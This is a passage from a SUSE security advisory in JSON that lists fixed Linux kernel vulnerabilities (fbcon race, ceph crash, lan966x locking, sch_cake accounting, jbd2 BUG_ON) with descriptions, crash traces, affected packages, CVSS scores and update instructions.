"url": "https://www.suse.com/security/cve/CVE-2025-68261"
},
{
"category": "external",
"summary": "SUSE Bug 1255164 for CVE-2025-68261",
"url": "https://bugzilla.suse.com/1255164"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68261"
},
{
"cve": "CVE-2025-68296",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68296"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup\n\nProtect vga_switcheroo_client_fb_set() with console lock. Avoids OOB\naccess in fbcon_remap_all(). Without holding the console lock the call\nraces with switching outputs.\n\nVGA switcheroo calls fbcon_remap_all() when switching clients. The fbcon\nfunction uses struct fb_info.node, which is set by register_framebuffer().\nAs the fb-helper code currently sets up VGA switcheroo before registering\nthe framebuffer, the value of node is -1 and therefore not a legal value.\nFor example, fbcon uses the value within set_con2fb_map() [1] as an index\ninto an array.\n\nMoving vga_switcheroo_client_fb_set() after register_framebuffer() can\nresult in VGA switching that does not switch fbcon correctly.\n\nTherefore move vga_switcheroo_client_fb_set() under fbcon_fb_registered(),\nwhich already holds the console lock. Fbdev calls fbcon_fb_registered()\nfrom within register_framebuffer(). Serializes the helper with VGA\nswitcheroo\u0027s call to fbcon_remap_all().\n\nAlthough vga_switcheroo_client_fb_set() takes an instance of struct fb_info\nas parameter, it really only needs the contained fbcon state. Moving the\ncall to fbcon initialization is therefore cleaner than before. Only amdgpu,\ni915, nouveau and radeon support vga_switcheroo. For all other drivers,\nthis change does nothing.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68296",
"url": "https://www.suse.com/security/cve/CVE-2025-68296"
},
{
"category": "external",
"summary": "SUSE Bug 1255128 for CVE-2025-68296",
"url": "https://bugzilla.suse.com/1255128"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68296"
},
{
"cve": "CVE-2025-68297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nceph: fix crash in process_v2_sparse_read() for encrypted directories\n\nThe crash in process_v2_sparse_read() for fscrypt-encrypted directories\nhas been reported. Issue takes place for Ceph msgr2 protocol in secure\nmode. It can be reproduced by the steps:\n\nsudo mount -t ceph :/ /mnt/cephfs/ -o name=admin,fs=cephfs,ms_mode=secure\n\n(1) mkdir /mnt/cephfs/fscrypt-test-3\n(2) cp area_decrypted.tar /mnt/cephfs/fscrypt-test-3\n(3) fscrypt encrypt --source=raw_key --key=./my.key /mnt/cephfs/fscrypt-test-3\n(4) fscrypt lock /mnt/cephfs/fscrypt-test-3\n(5) fscrypt unlock --key=my.key /mnt/cephfs/fscrypt-test-3\n(6) cat /mnt/cephfs/fscrypt-test-3/area_decrypted.tar\n(7) Issue has been triggered\n\n[ 408.072247] ------------[ cut here ]------------\n[ 408.072251] WARNING: CPU: 1 PID: 392 at net/ceph/messenger_v2.c:865\nceph_con_v2_try_read+0x4b39/0x72f0\n[ 408.072267] Modules linked in: intel_rapl_msr intel_rapl_common\nintel_uncore_frequency_common intel_pmc_core pmt_telemetry pmt_discovery\npmt_class intel_pmc_ssram_telemetry intel_vsec kvm_intel joydev kvm irqbypass\npolyval_clmulni ghash_clmulni_intel aesni_intel rapl input_leds psmouse\nserio_raw i2c_piix4 vga16fb bochs vgastate i2c_smbus floppy mac_hid qemu_fw_cfg\npata_acpi sch_fq_codel rbd msr parport_pc ppdev lp parport efi_pstore\n[ 408.072304] CPU: 1 UID: 0 PID: 392 Comm: kworker/1:3 Not tainted 6.17.0-rc7+\n[ 408.072307] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS\n1.17.0-5.fc42 04/01/2014\n[ 408.072310] Workqueue: ceph-msgr ceph_con_workfn\n[ 408.072314] RIP: 0010:ceph_con_v2_try_read+0x4b39/0x72f0\n[ 408.072317] Code: c7 c1 20 f0 d4 ae 50 31 d2 48 c7 c6 60 27 d5 ae 48 c7 c7 f8\n8e 6f b0 68 60 38 d5 ae e8 00 47 61 fe 48 83 c4 18 e9 ac fc ff ff \u003c0f\u003e 0b e9 06\nfe ff ff 4c 8b 9d 98 fd ff ff 0f 84 64 e7 ff ff 89 85\n[ 408.072319] RSP: 0018:ffff88811c3e7a30 EFLAGS: 00010246\n[ 408.072322] RAX: ffffed1024874c6f RBX: ffffea00042c2b40 RCX: 0000000000000f38\n[ 408.072324] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000\n[ 408.072325] RBP: ffff88811c3e7ca8 R08: 0000000000000000 R09: 00000000000000c8\n[ 408.072326] R10: 00000000000000c8 R11: 0000000000000000 R12: 00000000000000c8\n[ 408.072327] R13: dffffc0000000000 R14: ffff8881243a6030 R15: 0000000000003000\n[ 408.072329] FS: 0000000000000000(0000) GS:ffff88823eadf000(0000)\nknlGS:0000000000000000\n[ 408.072331] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 408.072332] CR2: 000000c0003c6000 CR3: 000000010c106005 CR4: 0000000000772ef0\n[ 408.072336] PKRU: 55555554\n[ 408.072337] Call Trace:\n[ 408.072338] \u003cTASK\u003e\n[ 408.072340] ? sched_clock_noinstr+0x9/0x10\n[ 408.072344] ? __pfx_ceph_con_v2_try_read+0x10/0x10\n[ 408.072347] ? _raw_spin_unlock+0xe/0x40\n[ 408.072349] ? finish_task_switch.isra.0+0x15d/0x830\n[ 408.072353] ? __kasan_check_write+0x14/0x30\n[ 408.072357] ? mutex_lock+0x84/0xe0\n[ 408.072359] ? __pfx_mutex_lock+0x10/0x10\n[ 408.072361] ceph_con_workfn+0x27e/0x10e0\n[ 408.072364] ? metric_delayed_work+0x311/0x2c50\n[ 408.072367] process_one_work+0x611/0xe20\n[ 408.072371] ? __kasan_check_write+0x14/0x30\n[ 408.072373] worker_thread+0x7e3/0x1580\n[ 408.072375] ? __pfx__raw_spin_lock_irqsave+0x10/0x10\n[ 408.072378] ? __pfx_worker_thread+0x10/0x10\n[ 408.072381] kthread+0x381/0x7a0\n[ 408.072383] ? __pfx__raw_spin_lock_irq+0x10/0x10\n[ 408.072385] ? __pfx_kthread+0x10/0x10\n[ 408.072387] ? __kasan_check_write+0x14/0x30\n[ 408.072389] ? recalc_sigpending+0x160/0x220\n[ 408.072392] ? _raw_spin_unlock_irq+0xe/0x50\n[ 408.072394] ? calculate_sigpending+0x78/0xb0\n[ 408.072395] ? __pfx_kthread+0x10/0x10\n[ 408.072397] ret_from_fork+0x2b6/0x380\n[ 408.072400] ? __pfx_kthread+0x10/0x10\n[ 408.072402] ret_from_fork_asm+0x1a/0x30\n[ 408.072406] \u003c/TASK\u003e\n[ 408.072407] ---[ end trace 0000000000000000 ]---\n[ 408.072418] Oops: general protection fault, probably for non-canonical\naddress 0xdffffc00000000\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68297",
"url": "https://www.suse.com/security/cve/CVE-2025-68297"
},
{
"category": "external",
"summary": "SUSE Bug 1255403 for CVE-2025-68297",
"url": "https://bugzilla.suse.com/1255403"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68297"
},
{
"cve": "CVE-2025-68320",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68320"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlan966x: Fix sleeping in atomic context\n\nThe following warning was seen when we try to connect using ssh to the device.\n\nBUG: sleeping function called from invalid context at kernel/locking/mutex.c:575\nin_atomic(): 1, irqs_disabled(): 0, non_block: 0, pid: 104, name: dropbear\npreempt_count: 1, expected: 0\nINFO: lockdep is turned off.\nCPU: 0 UID: 0 PID: 104 Comm: dropbear Tainted: G W 6.18.0-rc2-00399-g6f1ab1b109b9-dirty #530 NONE\nTainted: [W]=WARN\nHardware name: Generic DT based system\nCall trace:\n unwind_backtrace from show_stack+0x10/0x14\n show_stack from dump_stack_lvl+0x7c/0xac\n dump_stack_lvl from __might_resched+0x16c/0x2b0\n __might_resched from __mutex_lock+0x64/0xd34\n __mutex_lock from mutex_lock_nested+0x1c/0x24\n mutex_lock_nested from lan966x_stats_get+0x5c/0x558\n lan966x_stats_get from dev_get_stats+0x40/0x43c\n dev_get_stats from dev_seq_printf_stats+0x3c/0x184\n dev_seq_printf_stats from dev_seq_show+0x10/0x30\n dev_seq_show from seq_read_iter+0x350/0x4ec\n seq_read_iter from seq_read+0xfc/0x194\n seq_read from proc_reg_read+0xac/0x100\n proc_reg_read from vfs_read+0xb0/0x2b0\n vfs_read from ksys_read+0x6c/0xec\n ksys_read from ret_fast_syscall+0x0/0x1c\nException stack(0xf0b11fa8 to 0xf0b11ff0)\n1fa0: 00000001 00001000 00000008 be9048d8 00001000 00000001\n1fc0: 00000001 00001000 00000008 00000003 be905920 0000001e 00000000 00000001\n1fe0: 0005404c be9048c0 00018684 b6ec2cd8\n\nIt seems that we are using a mutex in a atomic context which is wrong.\nChange the mutex with a spinlock.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68320",
"url": "https://www.suse.com/security/cve/CVE-2025-68320"
},
{
"category": "external",
"summary": "SUSE Bug 1255172 for CVE-2025-68320",
"url": "https://bugzilla.suse.com/1255172"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68320"
},
{
"cve": "CVE-2025-68325",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68325"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_cake: Fix incorrect qlen reduction in cake_drop\n\nIn cake_drop(), qdisc_tree_reduce_backlog() is used to update the qlen\nand backlog of the qdisc hierarchy. Its caller, cake_enqueue(), assumes\nthat the parent qdisc will enqueue the current packet. However, this\nassumption breaks when cake_enqueue() returns NET_XMIT_CN: the parent\nqdisc stops enqueuing current packet, leaving the tree qlen/backlog\naccounting inconsistent. This mismatch can lead to a NULL dereference\n(e.g., when the parent Qdisc is qfq_qdisc).\n\nThis patch computes the qlen/backlog delta in a more robust way by\nobserving the difference before and after the series of cake_drop()\ncalls, and then compensates the qdisc tree accounting if cake_enqueue()\nreturns NET_XMIT_CN.\n\nTo ensure correct compensation when ACK thinning is enabled, a new\nvariable is introduced to keep qlen unchanged.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68325",
"url": "https://www.suse.com/security/cve/CVE-2025-68325"
},
{
"category": "external",
"summary": "SUSE Bug 1255417 for CVE-2025-68325",
"url": "https://bugzilla.suse.com/1255417"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68325"
},
{
"cve": "CVE-2025-68337",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68337"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\njbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted\n\nThere\u0027s issue when file system corrupted:\n------------[ cut here ]------------\nkernel BUG at fs/jbd2/transaction.c:1289!\nOops: invalid opcode: 0000 [#1] SMP KASAN PTI\nCPU: 5 UID: 0 PID: 2031 Comm: mkdir Not tainted 6.18.0-rc1-next\nRIP: 0010:jbd2_journal_get_create_access+0x3b6/0x4d0\nRSP: 0018:ffff888117aafa30 EFLAGS: 00010202\nRAX: 0000000000000000 RBX: ffff88811a86b000 RCX: ffffffff89a63534\nRDX: 1ffff110200ec602 RSI: 0000000000000004 RDI: ffff888100763010\nRBP: ffff888100763000 R08: 0000000000000001 R09: ffff888100763028\nR10: 0000000000000003 R11: 0000000000000000 R12: 0000000000000000\nR13: ffff88812c432000 R14: ffff88812c608000 R15: ffff888120bfc000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f91d6970c99 CR3: 00000001159c4000 CR4: 00000000000006f0\nCall Trace:\n \u003cTASK\u003e\n __ext4_journal_get_create_access+0x42/0x170\n ext4_getblk+0x319/0x6f0\n ext4_bread+0x11/0x100\n ext4_append+0x1e6/0x4a0\n ext4_init_new_dir+0x145/0x1d0\n ext4_mkdir+0x326/0x920\n vfs_mkdir+0x45c/0x740\n do_mkdirat+0x234/0x2f0\n __x64_sys_mkdir+0xd6/0x120\n do_syscall_64+0x5f/0xfa0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nThe above issue occurs with us in errors=continue mode when accompanied by\nstorage failures. There have been many inconsistencies in the file system\ndata.\nIn the case of file system data inconsistency, for example, if the block\nbitmap of a referenced block is not set, it can lead to the situation where\na block being committed is allocated and used again. As a result, the\nfollowing condition will not be satisfied then trigger BUG_ON. Of course,\nit is entirely possible to construct a problematic image that can trigger\nthis BUG_ON through specific operations. In fact, I have constructed such\nan image and easily reproduced this issue.\nTherefore, J_ASSERT() holds true only under ideal conditions, but it may\nnot necessarily be satisfied in exceptional scenarios. Using J_ASSERT()\ndirectly in abnormal situations would cause the system to crash, which is\nclearly not what we want. So here we directly trigger a JBD abort instead\nof immediately invoking BUG_ON.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
